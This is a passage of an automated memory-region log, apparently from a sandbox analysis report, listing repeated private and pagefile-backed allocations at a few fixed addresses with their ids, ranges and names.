monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7947 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7948 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7949 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7950 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7951 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7952 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7953 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7954 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7956 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7957 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7958 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7960 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7961 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7962 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7964 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7965 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7966 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7968 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7969 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7970 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7971 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7972 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7973 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7976 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7977 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7978 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7980 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7981 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7982 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7984 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7985 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7986 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7988 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7989 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7990 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7992 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7993 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7994 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7995 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7996 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7997 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7998 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7999 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8000 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8001 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8002 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8003 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8004 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8005 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8006 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8007 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8008 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8009 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8010 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8011 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8012 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8013 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8014 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8015 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8016 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8017 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8018 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8019 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8020 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8021 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8022 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8023 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8024 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8025 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8028 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8029 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8030 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8031 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8032 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8033 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8034 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8035 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8036 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8037 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8038 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8039 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8040 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8041 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8042 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8043 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8044 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8045 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8047 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8048 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8049 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8050 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8051 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8052 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8054 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8055 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8056 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8058 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8059 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8060 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8063 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8064 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8067 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8068 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8069 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8071 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8072 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8073 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8075 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8076 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8077 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8079 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8080 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8081 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8084 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8085 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8088 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8089 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8092 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8093 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8096 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8097 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8098 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8099 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8100 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8101 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8102 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8103 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8104 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8105 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8106 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8107 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8108 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8109 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8110 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8111 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8112 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8113 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8114 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8115 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8116 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8117 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8118 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8119 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8120 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8121 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8122 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8123 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8124 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8125 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8126 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8127 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8128 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8129 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8131 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8132 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8133 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8134 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8135 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8136 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8137 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8138 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8139 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8140 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8141 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8142 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8143 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8144 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 